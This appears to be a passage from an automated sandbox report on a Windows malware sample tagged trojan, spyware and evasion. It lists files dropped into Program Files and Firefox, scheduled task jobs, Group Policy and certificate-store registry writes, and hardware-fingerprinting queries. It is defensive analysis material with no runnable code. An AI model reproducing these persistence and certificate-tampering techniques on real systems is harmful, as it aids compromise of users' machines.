File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\FgzgbZZAFicU2\NSJEWZYheTYvn.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\PIalxcO.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\PnlHXrUXYeUn\haoQxrd.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\FgzgbZZAFicU2\tzpDtvt.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\xWNndLwYWxPLC\ZveOxSt.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\xWNndLwYWxPLC\JAwGJlf.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\LYowOqXOU\SEZhTv.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\LYowOqXOU\qwhXIaI.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\EzmnMyU.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\imJjYhUpaoZYZHtqO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\PrqbyCvyRaPTCyA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ovLFxavpEMJUeWygf.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe N/A
File created C:\Windows\Tasks\bnTqljwkAIckBwCXiX.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A

